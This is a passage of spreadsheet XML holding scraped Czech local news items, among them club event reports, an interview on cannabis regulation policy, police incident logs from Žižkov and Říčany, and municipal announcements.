odpoledne. Za Dětský domov a školní jídelnu Sedloňov Mgr. Milan Macek Klienti si na špekáčcích pochutnali v zázemí domova. foto: archiv Jitřenky Pokud byste chtěli hospic také podpořit, informace najdete na webu www.hospicrychnov.cz. Hurá na brusle! foto: archiv autora</t>
  </si>
  <si>
    <t>1650</t>
  </si>
  <si>
    <t>20241101_167_3245589444_a9bb8dc858bd67d44ec3.html</t>
  </si>
  <si>
    <t>a9bb8dc858bd67d44ec3</t>
  </si>
  <si>
    <t>Svaz tělesně postižených v ČR, z. s., MO Opočno</t>
  </si>
  <si>
    <t>Svaz tělesně postižených v ČR, z. s., MO Opočno Rubrika: z opočenských spolků — Halloween v Ateliéru Je říjen, setkání sokolníků, čas světýlek a dýní. A tak jsme uspořádali v pátek 11. října Halloween v Ateliéru. Nejprve jsme trochu vyzdobili salónek. Někteří přišli i oblečeni v různých kloboucích či oblečení, které nám právě tuto říjnovou dobu připomíná. Všechny přivítal Jirka Zácný a pak jsme hráli halloweenské bingo. Losovaly se obrázky a každý si je zaškrtával na soutěžním papíru s dvanácti obrázky. Jako první vykřikla své BINGO Zdena Zajíčková a vyhrála láhev vína . Druhé BINGO a láhev vína získal Jirka Zácný. Všichni ostatní byli odměněni různými dýněmi a pravítky s černou kočkou. Dali jsme si výbornou kávičku a Pavlínka nám vytvořila velice chutný strašidelný zákusek. Potom nastoupil Kvartet Jenne – Jirka Novotný , Gustav Jenne, Michal Matěna a Radek Holeček. Začali hrát známé písničky, u kterých jsme si zazpívali a někteří si i zatancovali. Moc jsme si to odpoledne užili. Děkujeme mnohokrát Renatě Pultarové a Pavlínce za vytvoření nádherné atmosféry a prvotřídní obsluhu. Miloslavě Richterové a Anně Hvězdové za dodání ozdobných dýniček. Soně Polové za kočičí pravítka a hudebníkům za vytvoření radosti v očích všech přítomných. Výlet do Rychnova nad Kněžnou V pátek 27. září jsme se vydali na výlet do nedalekého Rychnova nad Kněžnou . První naší zastávkou byl zámek – rodové sídlo Kolowratů. Získali jsme průvodce zapáleného do dějin, takže při výkladu nás různě zkoušel, my se mohli na všechno ptát, a když jsme věděli správnou odpověď, dostali jsme bonbón. Byla to velká legrace. Ze zámku jsme byli nadšeni. Potom jsme přešli chodbou do kostela Nejsvětější Trojice. Sedli jsme si do lavic, poslouchali výklad a nasávali kostelní atmosféru. Potom někteří vylezli na zvonici ke zvonu Kryštof. Následoval oběd v bufetu na náměstí. Hned po obědě jsme se šli podívat do Muzea hraček, kde nám paní průvodkyně vyprávěla příběhy hraček a co všechno uvidíme. A tedy bylo se opravdu na co dívat. Potom jsme alespoň pozdravili paní Vlastu Tomkovou, která je nyní v Oblastní charitě v Rychnově . Náš výlet jsme zakončili v synagoze. I tam paní průvodkyně vyprávěla příběhy Židů a o historii synagogy. Nechyběla také zmínka o Karlu Poláčkovi . Výlet jsme si opravdu užili. Bylo i krásné počasí. Tak zase určitě někam vyrazíme příští rok. Vždy s úsměvem Po delší odmlce díky covidovým opatřením jsme opět uspořádali v neděli 22. září úsměvné odpoledne. Však nám to zabralo hodně času, než jsme nacvičili všechno, co jsme chtěli předvést. Prvotní plán uspořádat toto odpoledne vzešel od Livie Kuchařové, nyní Blaško. Bohužel nám onemocněla a nemohla nám program uvádět ani zazpívat. V pátek jsme proto poprosili Petru Flígrovou, která nám ochotně vypomohla a celé představení odmoderovala. Moc jsme jí za to vděčni a patří jí velký dík. Jako první vystupující byl Martin Šafář, který nám zahrál dvě skladby na akordeon. Následovala scénka Červená šatovka, kterou nám předvedli Michal Matěna a Alena Přibylová. Jejich výbornému projevu jsme se pak dlouho smáli. Netradiční módní přehlídku zástěr uváděla Zdena Bittnerová. A že se modelky (Hanka, Kamila, Vendula, Jitka, Jaruška, Zdena, Alena, Ivanka, Lenka, Jarča) a modelové (Jaroslav a Jiří ) opravdu snažili, o tom svědčil stálý potlesk a smích v sále. Jirka Zácný si nacvičil báseň na hudbu Marcela Zmožka , devět tanečnic se záclonami (Jana, Jarča, Kamila, Hanka, Jaruška, Zdena, Iva, Jitka, Vendula) předvedlo vystoupení pod vedením Renaty Pultarové a skladbu jim zahrál na housle Vojta Štěpánek. Od jara do podzimu jsme fotografovali naše seniory při procházkách po Opočně a Lukáš Vondřejc nám zpracoval z těchto fotografií video. Hlavně babičky z Domovinky byly rády, že vidí po čase své bývalé sousedy a přátele. Také došlo na losování z odevzdané Letní hry pro seniory. Paní starostka Šárka Škrabalová vylosovala tři hlavní ceny ze sedmnácti odevzdaných brožurek se splněnými úkoly. Ostatní dostali květinový dárek, který všem nazdobila Eva Kolenová z Mělčan . Manželé Kolenovi pěstují jiřiny již mnoho let a jejich výstavy jsou nádherné. Potom ještě Jaruška Koudelková ztvárnila veselou babičku a na pódiu byl přivítán Tornádo Lou, houslista z Dobrušky, Vojta Štěpánek a zahrál nám Chválím Tě, země má, Tři oříšky pro Popelku a Ta naše písnička česká. A tu jsme si i my v sále rádi zazpívali. Všechno má jednou konec. A tak na písničku Každý na světě je tu rád jsme všem v hledišti zamávali. Velký dík patří také Miloši Flígrovi, který nám bravurně scénu nasvítil a pouštěl hudbu. Jirkovi Jarošovi a Otovi Ptáčkovi děkujeme, že nám přivezli babičky z Domovinky, a všem fotografům, kteří dodali fotografie a záběry z tohoto odpoledne, aby z nich Milan Bittner mohl vytvořit záznam. A vy se ptáte, jestli bude i nějaká legrace příští rok? Budeme se snažit. Letošní Halloween jsme společně prožili v Ateliéru Renata. Výlet do Rychnova se vydařil a přálo nám i počasí. Akci si užili jak diváci v hledišti, tak aktéři na jevišti. foto: 3× archiv spolku Autor: Svaz tělesně postižených v ČR, z. s., MO Opočno Rubrika transition_slide z opočenských spolků —</t>
  </si>
  <si>
    <t>20241101_168_3244271155_5422ea25b9e9a47c2b93.html</t>
  </si>
  <si>
    <t>5422ea25b9e9a47c2b93</t>
  </si>
  <si>
    <t>„Máme málo odvážných politiků. Regulovaný trh je mnohem lepší než prohibice,“ říká o přístupu k návykovým látkám Jindřich Vobořil</t>
  </si>
  <si>
    <t>„Máme málo odvážných politiků. Regulovaný trh je mnohem lepší než prohibice,“ říká o přístupu k návykovým látkám Jindřich Vobořil Jindřich Vobořil je přední český odborník na problematiku závislostí s více než třicetiletou praxí v oblasti prevence a léčby. V letech 2010 až 2018 a znovu od roku 2022 do srpna 2024 působil jako národní protidrogový koordinátor a prosazoval vyvážený přístup k drogové politice zahrnující prevenci, regulaci, léčbu a represi. Po dohodě s premiérem Petrem Fialou odstoupil z funkce k 31. srpnu 2024 a nyní pokračuje jako vládní poradce, přičemž se zaměřuje na prosazování reforem v oblasti regulace konopí a dalších závislostí. V rozhovoru jsme probrali téma legalizace marihuany a dva aktuální návrhy zákona o regulaci jejího pěstování a držení. Jak by vypadalo uzákonění samopěstování konopí? Co říká na argument, že se po jeho legalizaci navýší počet nehod řidičů pod vlivem marihuany? A jaké návykové látky jsou nejvíce „populární“ v LGBTQ+ komunitě? Autor 1. 11. 2024 Do konce roku by měl být projednán nový zákon týkající se legalizace marihuany, přičemž má existovat několik možných cest. Můžete je ve stručnosti přiblížit? Na stole jsou dva zákonné návrhy. Jeden je z dílny ministerstva spravedlnosti a týká se pouze trestního zákoníku. V něm jde o depenalizování držení marihuany a vypěstování tří kytek konopí. Držet u sebe doma by člověk mohl až 50 gramů marihuany. Dával jsem k tomu protinávrh, okolo kterého se strhlo peklo. Chtěl jsem, aby se u všech drog v prvních třech odstavcích ( část právního předpisu, která rozlišuje závažnost trestného činu a stanovuje příslušné trestní sazby, pozn. red.) snížily hranice trestů, protože už na druhém a třetím odstavci začínají sazby odnětí svobody za pěstování či držení na pěti až osmi letech. Chtěl jsem, ať tam je větší rozptyl, ať se dokáží rozlišit případy, kdy si někdo vypěstuje pár kytek v lese a prodá marihuanu čtyřem nebo deseti lidem, a kdy toho někdo prodává tuny po celé Evropě . Ten druhý návrh, který jsem podával ještě z pozice národního koordinátora, říká, že potřebujeme implementovat všechny tři druhy dostupnosti konopí – samopěstování, delegaci pěstování na třetí osobu například pro imobilní lidi, kteří si sami nic vypěstovat nemohou, ideálně v podobě konopných klubů, a regulovaný trh, který je podle mého přesvědčení jedinou cestou, jak zabránit dopadům černého trhu. Nelegální trh je totiž mnohem horší než samotné užívání konopí, vzhledem k tomu, kam tečou peníze z nelegálních zdrojů. Více v Galerii Zdroje: Adobe Stock, Jindřich Vobořil /Se svolením Který z těchto dvou návrhů podle vašeho názoru projde? Ve hře je teď spíš jen to samopěstování. Já se ale nyní domlouvám s několika poslanci, že tu moji verzi někdo načte jako poslaneckou iniciativu. Bude to znít zvláštně, ale paradoxně to možná půjde lépe bez Pirátů ve vládě. Není to namířené proti nikomu jakkoliv osobně, ale i s nimi byla vlastně hrozně složitá debata. Nejen s lidovci, ale ani s Piráty jsem se pořád nemohl dohodnout, zda předložit celkový návrh včetně regulovaného trhu. V závěru neměli už vůbec žádnou energii a sílu na prosazení větších změn. Viděl jsem v nich dokonce i jakousi odevzdanost. Podpořili samopěstování, aby tu něco bylo, ale pro celkový návrh jsem podporu nedostal, protože se čekalo, že to budou řešit oni. Takže nakonec je ještě vlastně nějaká šance, že se bude pracovat s tou mojí plnou verzí, ale uvidíme. Vstoupí do toho v listopadu ještě Němci se svojí ministerskou konferencí, kdy chtějí najít dostatečný počet zemí k tomu, aby se v tomhle ohledu mohly změnit zákony v celé EU. Jde o to, že by nám aktuálně mohla Evropská komise způsobit trápení, pokud bychom ten regulovaný trh spustili, a proto je potřeba v této oblasti změnit i evropskou legislativu. Návrh, který se snažíte prosadit, je ideální forma toho, jak by to mělo podle vás celé vypadat? Ano, je to v mnoha ohledech kompromisní řešení, protože návrh procházel rukama policie, státních zástupců a ministerských úředníků. I přesto se jedná o velmi slušný základ pro další kroky. Například abychom mohli vyřešit některé problémy s mezinárodními úmluvami a naší vnitřní kontrolou, tak je za mě potřeba dále přistoupit i k registraci uživatelů marihuany, pokud si budou chtít na regulovaném trhu něco nakupovat. Já vím, že to nikdo nechce, a chápu to, ale na druhé straně to musí být anonymizovaná registrace. Je nutno dodat, že ten registr nemusí provozovat stát. Zkrátka by například člověk dostal nějakou kartičku s čipem, kterou by mohl použít právě v konopném klubu. Obdobně to funguje i na některých místech ve Španělsku . V něčem bych byl zkrátka přísnější a v něčem bych ponechal více svobody. Například bych neomezoval počet lidí v klubu nebo množství marihuany, které by mohl lidem denně či měsíčně vydávat. Je to podle mě úplně zbytečné. Tipy redakce Zahlédl jsem, že už teď existuje několik klubů, které chystají od příštího roku systém registrace členů, takže vašemu návrhu nejspíš docela věří… Někdo mi v kampani přece musí pomoct! ( smích ) Pokud nakonec dojde k načtení ve Sněmovně, tak bude možnost obcházet jednotlivé poslance a řešit to s nimi, čili jak už jsem řekl, nějaká šance tu pořád je. I lidovci připouští, ačkoliv nemají rádi představu konopných klubů, že pouze samopěstování nestačí, a to hlavně u seniorů a lidí, kteří mají poruchu hybnosti nebo jsou na vozíku. Uznávají tedy, že by měla existovat nějaká forma delegace. Jak by fungovalo samopěstování? Pokud si člověk bude moct vypěstovat kdekoliv tři kytky, nebude pak republika zaplavená konopím? A taky se nabízí otázka, jak se vlastně bude kontrolovat to, o kolik rostlin se doma člověk stará? Dá se tohle nějak uhlídat? Na to nemá státní správa kapacity. I teď, když si někdo pěstuje a vletí na něj policie, tak to je většinou na udání. U nás obecně pěstuje konopí hodně lidí, protože do pěti kytek je to jen za pokutu, což jim za ten risk stojí. Co se týká zaplavení republiky konopím, měl bych jeden příklad. Před třemi lety v Thajsku povolili samopěstování s tím, že si člověk musí za 100 dolarů koupit licenci. Během dvou měsíců si ji pořídilo asi milion lidí. A kromě toho, že to přineslo státnímu rozpočtu hodně peněz, ukázalo se, že tak žhavé to zase není. Během krátké chvíle licencí zase velmi ubylo. Lidé si něco zkusili vypěstovat a spousta z nich zjistila, že to neumí, nebo je to nebaví. Nasušili si pár pytlíčků a dál už nic nepěstovali. U nás by to nebylo o moc jiné. Podle mě není lepší řešení, než mít na tohle různé specializované obchody, jako jsou třeba coffee shopy v Nizozemsku . Fungují tam desítky let a žádné drama se nekoná. Blbé je akorát to, že nemají žádnou oficiální pěstební licenci, což ale nyní chtějí změnit. Lidé, kteří legalizaci marihuany odmítají, argumentují tím, že např. přibude řidičů pod vlivem konopí, a tím pádem i nehod. Z čeho taková tvrzení vycházejí? Tohle téma se hodně řešilo v případě Colorada v USA , kde klesl počet uživatelů alkoholu a ve stejné míře se zvýšil počet uživatelů konopí. S tím klesl počet nehod pod vlivem alkoholu a stoupl počet nehod pod vlivem konopí. Dá se tedy říct, že na celkové číslo nehodovosti legalizace vliv neměla, jen se vystřídaly příčiny. Mimochodem, konopí nahrazuje alkohol velmi často. Pak je tu třeba Kanada , kde se tvrdilo, že to bude stejné, ale nebylo. Tam sice na krátký čas vzrostl počet nehod pod vlivem konopí, ale v celkových číslech se nakonec překvapivě ukázalo, že jich obecně ubylo. Tím to ale nechci nijak podporovat, sedat za volant pod vlivem konopí určitě není dobře. Policie na zachycení takových situací bude mít své nástroje. Už dnes máme testy, které jsou schopny odhalit aktuální efekt konopí, nikoliv ten dlouhodobý. Konopí totiž dlouho zůstává v těle, těžko se odbourává, ale už druhý den nemá vliv na pozornost, jako tomu je přímo v okamžiku požití a několik hodin poté. Ale zákon bude řízení pod vlivem konopí zakazovat, stejně jako je to s alkoholem . Spotřeba alkoholu sice klesá, ale platí to jen u mužů. U žen naopak jeho spotřeba mírně stoupla Foto: Adobe Stock Mimochodem, máme velkou nehodovost pod vlivem léčiv, ale vůbec se o tom nemluví. Je tu zhruba milion lidí, kteří užívají léky na spaní a na uklidnění, a když si otevřete příbalový leták, je tam doporučeno neřídit. Ale asi je nepředstavitelné brát jim kvůli tomu řidičáky. Poslední roky si můžeme všimnout, že spotřeba alkoholu v Česku spíše klesá. Mezi lidmi panuje obecné přesvědčení, že tento stav je vyvážen právě přibýváním uživatelů marihuany a dalších drog. Je to skutečně tak? V Evropě ano, u nás ne. Jsme jedna ze dvou zemí, kde jsme narazili na jakýsi strop, který je tedy nejvyšší ze všech, a poslední léta u nás užívání konopí trendově klesá. Ta druhá země je Itálie . Ohledně alkoholu , spotřeba se skutečně snížila, ale jen u mužů. U žen naopak mírně stoupla. Takže jsme v tomhle ohledu ještě stále na špici spolu s Francií a myslím i Litvou . Trh se ale rozděluje a lidé objevují i jiné látky, teď aktuálně například kratom. Ten u nás vyvolal velké pozdvižení. Jak se k této problematice stavíte? Měl by se kratom regulovat podobně jako konopí? Nedávno prošel Senátem i evropskou notifikací zákon o tzv. psychomodulačních látkách, který jsem osobně vypracoval s týmem při Úřadu vlády. V podstatě jsme vytvořili novou kategorii vedle jídla, léčiv a zakázaných látek, kde ty méně rizikové látky mohou být prodávány v kontrolovaném prostředí se zákazem prodeje nezletilým a jen ve specializovaných obchodech. Jsou tam nějaké kompromisy, ale princip je správný. Trvalo mi léta, než jsem pochopil, že regulovaný trh funguje lépe než prohibice. I přesto, že je u nás dlouhodobě určitá společenská tolerance marihuany a různých psychedelických látek, podobné úpravy legislativy přichází až dnes. Jak je to možné? Paradoxně jsme na špici v pelotonu změn, drhne to úplně všude v EU i mimo ni. Je jen pár zemí, kterým se podařilo udělat v dané oblasti nějaké změny – Nizozemsko , Lucembursko , Malta a teď i Německo . Velikou roli v tom hraje souboj různých odvětví, přičemž ohromnou sílu má nelegální průmysl, který je obrovský a mocný a je napojený na některé totalitní státy. Taky funguje úplně stejně jako ten legální. Používá průzkumy trhu, mediální kampaně a dehonestaci lidí s návrhy, které by ho poškodily. Chová se konkurenčně úplně stejně jako některý farmaceutický či alkoholový průmysl. Co se týká politiků, ti jsou vždy opatrnější než běžní voliči. Nechtějí se příliš pouštět do kontroverzních témat, takže i když si většina z nich něco myslí, nevezmou do ruky vlajku a nepůjdou na bojiště. Radši se pak například zdržují hlasování. Máme málo odvážných politiků. Jednou z mála výjimek byl senátor MUDr. Roman Kraus , který ale bohužel už není mezi námi. Tipy redakce Existuje nějaká statistika ohledně užívání drog v LGBTQ+ komunitě? Velkým problémem, hlavně při mužském homosexuálním styku, je tzv. chemsex. S ním je často spojeno větší riziko přenosu některých pohlavních nemocí a není moc služeb, které by se v tomto ohledu specializovaly na prevenci či edukaci. Z pohledu státní politiky je toto téma u nás zatlačeno někam dozadu a mně se už bohužel nepodařilo dotáhnout do konce nějaké změny. Nicméně skrze svůj Think Tank Racionální politiky závislostí se budu snažit tohle téma více zviditelnit. Nejoblíbenější nelegální drogou, když pominu konopí a kratom, je pak pervitin. Zajímavostí je, že mezi jeho nitrožilními uživateli takřka nemáme, jako jedni z mála na světě, výskyt HIV. Je to asi jedno promile. Hrozně nám ale uniká taneční scéna, kde je potřeba opravdu něco zásadního udělat. Musíme tohle téma nějak citlivě zviditelnit tak, aby lidé vnímali, že je potřeba i do této oblasti vložit část úsilí. Zdroj: Redakce/Respondent ( Jindřich Vobořil ) Autor: Michal Černý Autor person Michal Černý</t>
  </si>
  <si>
    <t>20241101_169_3244477418_7460a00650db0a452b40.html</t>
  </si>
  <si>
    <t>7460a00650db0a452b40</t>
  </si>
  <si>
    <t>Kriminálka Žižkov</t>
  </si>
  <si>
    <t>Shrnutí Kriminálka Žižkov Rubrika: Expres Dívku vláčela jedoucí tramvaj V pondělí 30. září vyjížděli policisté k nehodě v Seifertově ulici. Dívka, která tam dobíhala tramvaj, zůstala zaklíněná v jejích dveřích potom, co se vůz rozjel. Na místě zasahovala záchranná služba, která ženě ošetřila lehké zranění. Při srážce s tramvají přišla o nohu V úterý 24. září srazila u zastávky Chmelnice tramvaj mladou dívku. Ta utrpěla devastující zranění dolní končetiny. Na pomoc jí ihned přispěchal kolemjdoucí strážník. Vyprostil ji zpod vozu a zastavil krvácení nohy. Záchranná služba následně převezla dívku do nemocnice, kde byla uvedena do umělého spánku. Policie provedla u řidičky tramvaje dechovou zkoušku, která byla negativní. Okolnosti nehody dál vyšetřuje. Svoji negramotnost bude vysvětlovat úřadům V pondělí 23. září zastavila policie v Hartigově ulici dva koloběžkáře, kteří jeli po chodníku. Při testu na přítomnost alkoholu v krvi nadýchal jeden z nich 1,62 promile. Protokol o spáchání přestupku odmítl ale podepsat s odůvodněním, že se nenaučil psát. Nejen svou negramotnost bude teď vysvětlovat úředníkům. Druhý muž zaplatil pokutu 300 Kč. Na Vinohradech bylo objeveno tělo mrtvé ženy Policisté našli v pátek 23. srpna v bytě ve Slezské ulici mrtvou osmdesátiletou ženu. Na místo přivolali koronera, a protože nebylo možné vyloučit zavinění smrti cizí osobou, přijela taky skupina kriminalistů. Ti událost zadokumentovali a zajistili stopy. Zároveň nařídili soudní pitvu zemřelé. Partnera zabil kvůli toxické psychóze Soud se začal zabývat případem 47letého muže, který minulý rok zavraždil v areálu nákladového nádraží svého přítele. Muž čin u hlavního líčení nepopřel, řekl ale, že neměl v úmyslu partnera zabít. Rvačka údajně vznikla kvůli tomu, že mu druh ukradl občanský průkaz a chtěl ho prodat. Útočník se několikrát léčil na psychiatrii, předepsané léky ale nebral. Uvedl, že mu byla diagnostikována toxická psychóza, která vzniká kvůli užívání psychotropních látek. V minulosti byl už několikrát odsouzený a teď mu hrozí až dvacet let vězení nebo výjimečný trest. Autor: Připravila Vendula Kryštofová Autor person Vendula Kryštofová Rubrika transition_slide Expres</t>
  </si>
  <si>
    <t>65000</t>
  </si>
  <si>
    <t>20241101_17_3352060991_0bc84653e8d3c8734fdd.html</t>
  </si>
  <si>
    <t>0bc84653e8d3c8734fdd</t>
  </si>
  <si>
    <t>Rok vězení za telefon v ruce během jízdy na kole. Nový zákon v Japonsku zpřísňuje tresty pro cyklisty V Japonsku v pátek vešel v platnost zákon ukládající vězení a pokuty cyklistům , kteří používají při jízdě mobilní telefon nebo jsou pod vlivem alkoholu . Nejvyšší pokuta činí v přepočtu 152 000 korun, maximální délka odnětí svobody pět let, píše agentura Kjódó.... Celý článek naleznete na: www.irozhlas.cz/... Autor: iROZHLAS.cz</t>
  </si>
  <si>
    <t>20241101_170_3244607806_2ddede618d6b7368059b.html</t>
  </si>
  <si>
    <t>2ddede618d6b7368059b</t>
  </si>
  <si>
    <t>Mikulášská nadílka s kouzlem Josefa Lady!</t>
  </si>
  <si>
    <t>Mikulášská nadílka s kouzlem Josefa Lady! V infocentru na Masarykově náměstí ve Staré radnici jsme na blížící se svátky připraveni. Vybírat můžete z mnoha kalendářů, dětských knížek, omalovánek, hrníčků a spousty sladkostí s půvabnými motivy Josefa Lady . Kromě toho nabízíme drobné dárky s vánoční tématikou, dárkově balené víno a pestrou nabídku chutí pečených čajů a punčů, které vás zahřejí v chladných zimních dnech. Zastavte se u nás a vyberte dárečky, které potěší nejen na Mikuláše, ale i pod stromečkem! Těšíme se na vaši návštěvu!</t>
  </si>
  <si>
    <t>6900</t>
  </si>
  <si>
    <t>20241101_171_3244546140_d2de2faebfc0cee41d13.html</t>
  </si>
  <si>
    <t>d2de2faebfc0cee41d13</t>
  </si>
  <si>
    <t>Městská policie radí a informuje</t>
  </si>
  <si>
    <t>Shrnutí Městská policie radí a informuje Rubrika: Bezpečnost a infrastruktura Městská policie Říčany Komenského nám. 1619/3, 251 01 Říčany e-mail: mestska.policie@ricany.cz Tel. 323 618 150 Mob. 725 022 765 Z knihy událostí 29. září, 21.46 Strážník dozorující městský kamerový dohlížecí systém si všímá osoby, která se pohybuje v ulici Kamenická u boxů, které slouží k uložení jízdních kol. Osoba se pokouší do jednotlivých boxů násilně vniknout, proto je na místo okamžitě vyslána hlídka strážníků. Když osoba spatří strážníky, nasazuje si kapuci a snaží se nenápadně zmizet do ulice Ruská. Zde je osoba dostižena a následně ztotožněna. Strážníkům osoba sděluje, že v místě hledá jízdní kolo, na kterém měla do místa přijet. Prověřením záznamů kamer je zjištěno, že do místa přišla pěšky a ve vnitřní části rondelu si též prohlížela odstavená jízdní kola a zkoumala jejich zabezpečení. Zatím k ničemu protiprávnímu nedošlo, ale strážníci tuší, že pokud místo opustí, osoba se pokusí některé jízdní kolo ukrást. Strážníci místo na oko opouštějí, ale osoba je dále monitorována za pomoci kamer. Tušení bylo správné a osoba zanedlouho vyndavá štípací kleště a pokouší se u několika jízdních kol přeštípnout bezpečnostní lankový zámek. Strážníci při činu osobu zadržují a omezují na osobní svobodě, jelikož je důvodně podezřelá z pokusu spáchání trestného činu. Osoba je předána Policii ČR k provedení dalších úkonů a opatření. Tím by tato událost mohla končit, ale nekončí. Po provedených úkonech ze strany Policie ČR je osoba policisty propuštěna. Asi o hodinu později na základě telefonického oznámení strážníci zjišťují dle popisu stejnou osobu, která se neoprávněně nacházela v bytovém domě v ulici 17. listopadu. Dále je nahlášena krádež elektrocentrály, která s výskytem osoby také souvisí, a aby toho nebylo málo, je v brzkých ranních hodinách osoba nalezena obyvateli domu v ulici Jiráskova, kam násilně vnikla a poškodila vstupní dveře. Strážníci osobu opětovně předávají i se všemi zjištěnými skutky Policii ČR k provedení dalších úkonů. 4. října, 04.40 Všechny složky integrovaného záchranného systému včetně strážníků míří do ulice Družstevní, kde se v bytovém domě objevil ve stoupací šachtě čtvrtého nadzemního patra kouř. Strážníci informují hasiče a následně evakuují obyvatele do bezpečí před dům. Starším osobám je poskytnuto služební vozidlo strážníků k zajištění a udržení jejich tepelného komfortu v chladných brzkých ranních hodinách. V souvislosti s událostí a pravděpodobně tíhou vzniklého stresu a vypětí dochází u jednoho obyvatele domu ke kolapsovému stavu. Ten je okamžitě předán do péče přítomné posádky zdravotnické záchranné služby k ošetření. Příčina zakouření stoupaček, je průzkumem hasičů zjištěna. V jedné z bytových jednotek zapnutý větrák odsávání propálil stěnu větrací šachty a došlo k zakouření prostor. 7. října, 17.40 Hlídka strážníků prováděla plánovanou kontrolní činnost v rámci dohledu na bezpečnost a plynulost silničního provozu v rámci rekonstrukce Černokostelecké ulice. Řidič vozidla značky Ford porušil zákaz vjezdu, vozidlo bylo zastaveno strážníky k řešení přestupku. Dalo by se konstatovat, že šlo o každodenní rutinu. Ale řidič před zastavením vozidla strážníky zmatkuje, vybočuje ze směru jízdy a kličkuje. V protisměru řidič ohrožuje autobus hromadné dopravy, který místem projíždí, až jej přinutí svou jízdou zastavit. Po kontrole dokladů potřebných k řízení vozidla a zjištění totožnosti řidiče tento ke svému přestupkovému jednání uvádí, že si myslel, že uzavřenou ulicí projíždět může. Při komunikaci s ním ale strážníci nabývají dojmu, že je řidič pod vlivem alkoholu . Řidič výzvu k podrobení se orientační dechové zkoušce nejprve odmítá. Následně ale s provedením zkoušky souhlasí. Ta je s pozitivním výsledkem a hodnotou 1,49 ‰ alkoholu v dechu. Řidič vozidla je omezen na osobní svobodě, jelikož je důvodně podezřelý ze spáchání trestného činu. Následně je předán hlídce Policie ČR k provedení dalších úkonů a opatření. Autor: Jindřich Joch zástupce vedoucího Městské policie Říčany Autor person Jindřich Joch Rubrika transition_slide Bezpečnost a infrastruktura</t>
  </si>
  <si>
    <t>20241101_172_3244546136_942c40706fc48b699b2c.html</t>
  </si>
  <si>
    <t>942c40706fc48b699b2c</t>
  </si>
  <si>
    <t>Říčanské HUSO-VÍNO-BRANÍ</t>
  </si>
  <si>
    <t>Říčanské HUSO-VÍNO-BRANÍ Rubrika: Informace z radnice V sobotu 9. listopadu se sejdeme v Zóně svobody v ulici Politických vězňů. Ve 13 hodin se vypravíme v průvodu na Masarykovo náměstí. Průvod povede Martin na bílém koni (kůň možná nebude bílý, jak praví pranostika, ale to nám náladu nezkazí). Přijďte s námi oslavit svátek svatého Martina . Letos jsme pro vás připravili první ročník Říčanského HUSO-VÍNO-BRANÍ, které se uskuteční na Masarykově náměstí. A co si pod tím vlastně můžete představit? Spoustu skvělé zábavy, hudby, jídla a pití. Zkrátka svatomartinské hody, jak mají být. Budete moci ochutnat vína od různých vinařů, dát si svatomartinskou husu a další dobroty. K tanci a poslechu zahraje staropražská kapela Třehusk, nebude chybět ani interaktivní divadlo pro děti i dospělé či kreativní dílničky. Děti si vyrobí vlastní lampion. Celý večer zakončíme lampionovým průvodem na hrad, kde pro děti budou připraveny špekáčky zdarma. Společně si užijeme podvečerní pohodu u ohně a kytary. Rubrika transition_slide Informace z radnice</t>
  </si>
  <si>
    <t>20241101_173_3244546156_055f8bf6a96cbce3e41f.html</t>
  </si>
  <si>
    <t>055f8bf6a96cbce3e41f</t>
  </si>
  <si>
    <t>Problém bezdomovectví je velkou výzvou</t>
  </si>
  <si>
    <t>Problém bezdomovectví je velkou výzvou Od září jste v Říčanech mohli potkávat členy bezpečnostní agentury, kteří ve spolupráci s městskou policií dohlíželi na veřejný pořádek. Jejich úkolem bylo zvýšit bezpečnost v ulicích, což uvolnilo kapacity městské policie pro řešení aktuálních problémů, jako je například uzavírka ulice Černokostelecké. Hlavním cílem nasazení dalších služeb ve městě bylo čelit problémům spojeným s bezdomovectvím. Hlídky měly za úkol dohlížet na místa, kde se lidé bez domova často zdržují, a předcházet tak vandalismu a dalším negativním jevům. Velký problém je to zejména v blízkosti škol nebo na náměstí. Díky pravidelným kontrolám a soustavnému dohledu se situace zlepšila. Městská policie spolupracuje s Odborem sociálních věcí a zdravotnictví MěÚ Říčany, který se snaží nabídnout konkrétní pomoc a nenechává osoby v krizových situacích bez pomoci. Úspěšným příkladem byla pomoc člověku bez domova, kterému Odbor sociálních věcí a zdravotnictví zajistil dobrovolnou protialkoholní léčbu. Mnohdy se však setkáváme s případy, kdy lidé pomoc a návrat do běžného života odmítají. Paradoxně je to i z důvodu velké štědrosti občanů, kteří nosí lidem bez domova jídlo a také peníze, za které si mohou kupovat alkohol . Řešení problému bezdomovectví zůstává výzvou pro většinu měst, a Městská policie Říčany se tímto tématem bude zabývat i nadále. Prosíme občany, aby v případě narušení veřejného pořádku neváhali kontaktovat městskou policii. Autor: Václav Řezáč, vedoucí Městské policie Říčany Autor person Václav Řezáč</t>
  </si>
  <si>
    <t>20241101_174_3244521273_e68937a82132532f9723.html</t>
  </si>
  <si>
    <t>e68937a82132532f9723</t>
  </si>
  <si>
    <t>Pozvánky pro veřejnost</t>
  </si>
  <si>
    <t>Pozvánky pro veřejnost Zastupitelstvo Středa 13. 11. od 18.30 hodin Zasedání zastupitelstva města Říčany se uskuteční v zasedací síni radnice na Masarykově náměstí 53. Podrobný program bude zveřejněn na úřední desce a na webu města. Setkání v Pacově Pondělí 11. 11. od 18 hodin Setkání starosty a dalších zástupců města s osadním výborem a s občany se uskuteční v obecním domě v Pacově . Zveme vás na první Říčanské HUSO– VÍNO –BRANÍ V sobotu 9. listopadu se sejdeme v Zóně svobody v ulici Politických vězňů. Ve 13 hodin se vypravíme v průvodu na Masarykovo náměstí. Průvod povede Martin na bílém koni.</t>
  </si>
  <si>
    <t>20241101_175_3244271686_02d9a33cc8c683383619.html</t>
  </si>
  <si>
    <t>02d9a33cc8c683383619</t>
  </si>
  <si>
    <t>Že falšujeme plzeňské pivo Braníkem z PETky? Lež, brání se hostinská z Prahy</t>
  </si>
  <si>
